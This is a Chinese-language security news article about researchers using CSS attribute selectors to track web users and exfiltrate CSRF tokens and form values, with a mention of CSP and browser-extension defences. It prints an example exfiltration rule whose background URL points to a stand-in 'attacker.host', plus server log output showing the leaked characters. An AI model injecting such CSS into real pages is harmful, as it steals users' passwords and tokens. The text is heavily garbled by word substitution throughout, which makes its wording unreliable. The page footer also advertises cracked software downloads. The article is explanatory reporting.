ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全新闻 → CSS代码被用来手机互联网用户敏感数据【黑客新闻】

CSS代码被用来手机互联网用户敏感数据【黑客新闻】

时间:2018-02-08 00:00:00人气:作者:本站作者我要评论

CSS代码被用来手机互联网用户敏感数据【黑客新闻】

CSS不仅在网页展现时壮大,在追踪用户时也能施展感化。它能够或许追踪网站用户,从网页中提取和盗取数据,网络表单域中输出的数据(包括暗码),乃至让暗网用户裸露身份。

在过去的一个月里,三个风趣的研讨名目都把CSS作为进击序言,表现了这类看似有害的说话也能被用来针对用户。

应用CSS跟踪页面上的用户

对于这个主题的第一个名目是JanBöhmer的一个名目“Crooked Style Sheets”,这个名目供给了一个无JavaScript的跟踪计划,能够通过CSS代码的页面交互跟踪用户。

Böhmer表现,他能够跟踪用户什么时候悬停鼠标,什么时候点击链接,什么时候在输出字段中输出文本,和网络大批实在的用户署理信息,即使用户应用假的UA也没有效。

应用CSS盗取CSRF token

与Böhmer的事情分歧,平安研讨职员Dylan Ayrey(XSSJacking作者)也在上周末宣布了新的研讨成果,展现进击者若何滥用CSS来盗取CSRF(用户身份验证)token。

Ayrey的进击只适用于在各类HTML页面元素的属性中存储CSRF令牌的重大差错的网站和应用程序,是以其规模异常无限。这类进击能够很容易被网站/应用程序所有者击败,他们发明一种更平安的方法来验证用户,而不会在网页的源代码中推销CSRF令牌。

Ayrey的技巧依赖于在网页中注入CSS代码,应用CSS属性选择器每次猜解CSRF token的一个字母。

进击必要10秒钟阁下实现,乃至能够在不必要iframe的情况下事情,不必要连续流量的长途服务器也就没有机遇提示呈现问题的用户。

CSS属性选择器的威逼不止于此

Ayrey的研讨只是停留在外面。过去的一个月中,平安研讨员Mike Gualtieri也不停在尽力应用雷同的技巧,但不仅仅是盗取token。

Gualtieri研讨的是若何应用CSS属性选择器来预测留在HTML标签内的敏感内容。

研讨职员能够或许应用这类办法网络在表单域中输出的敏感用户数据,包括暗码字符串。

事情道理

Ayrey和Gualtieri的办法都应用了CSS属性选择器,属性选择器能让开辟职员查问单个属性的页面HTML标志,而且婚配它们的值。

举个例子,下面的CSS代码将搜刮页面中的“href”属性包括“facebook”字符串的链接元素(“a”),并将所有这些链接加之蓝色。

a[href*="facebook"] {   color: blue; }

这些查问看似有害,但在研究人员看来可能被用来实行进击。

这些查问能够拼接在一起,履行根本的字典暴力进击,并测验考试预测属性的肇端字母,而后将识其余字母添加到新的形式婚配语法中,从而进击者能够猜解第二个,第三个等字母。

[attribute=value]   [foo=bar]     选择foo =“bar”的所有元素

[attribute~=value]  [foo~=bar]    选择所有包含单词“bar”的foo属性的元素

[attribute|=value]  [foo|=bar]    选择所有具有以“bar”开头的foo属性值的元素

[attribute^=value]  [foo^="bar"]  选择所有具有以“bar”开头的foo属性值的元素

[attribute$=value]  [foo$="bar"]  选择所有具有以“bar”结尾的foo属性值的元素

[attribute*=value]  [foo*="bar"]  选择所有包含子字符串“bar”的foo属性的元素

攻击者必要结构歹意HTTP哀求,履行CSS代码选择器。

#username[value="ZeroC00L"] {
background:url("https://attacker.host/ZeroC00L");
}
攻击者只必要经由过程对服务器404的差错挑选,找出想要的成果。

127.0.0.1 - - [30/Jan/2018:11:09:35 -0500] "GET /00 HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:35 -0500] "GET /0L HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /Ze HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /Z_ HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /ro HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /oC HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /_L HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /er HTTP/1.1" 404 22127.0.0.1 - - [30/Jan/2018:11:09:36 -0500] "GET /C0 HTTP/1.1" 404 22
以后再把字符串组分解完备的数据

Z # Z_Ze # ZeZer # erZero # roZeroC # oCZeroC0 # C0ZeroC00 # 00ZeroC00L # 0L _L

Ayrey和Gualtieri用了两种分歧的办法停止进击。 Ayrey一次预测末了一个字母,而Gualtieri则经由过程多个预测来重修字符串,末了将他们组合。

两种办法都有用。Ayrey的办法乐音较大,但能够很容易自动化,而Gualtieri的办法更快(也能够自动化),但在某些情况下会依附于人来拼接字符串。

Gualtieri将此技巧命名为CSS Exfil。但CSS Exfil只能在加载时盗取页面上的HTML属性,不能在初始页面加载后从静态注入的代码中盗取。 Gualtieri觉得这不是大问题,他的研讨提到进击者能够有各类办理办法。

方法:

防备CSS Exfil进击能够分为两个层面。起首,网站和收集应用法式作者能够实行内容平安战略(CSP),避免进击者从外部加载CSS代码。

其次,访客还能够装置Gualtieri的Firefox或Chrome扩大法式,它能够检测Gualtieri在他的研讨中记载的一切范例的CSS Exfil进击,并在履行以前重写歹意代码。

你能够拜访这里的网页停止测试。

CSS Exfil并非一项新技巧,2016年的CureSec就已经评论辩论过,但是在曩昔一个月中,这类进击办法吸引了多位研讨人员的眼光。

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网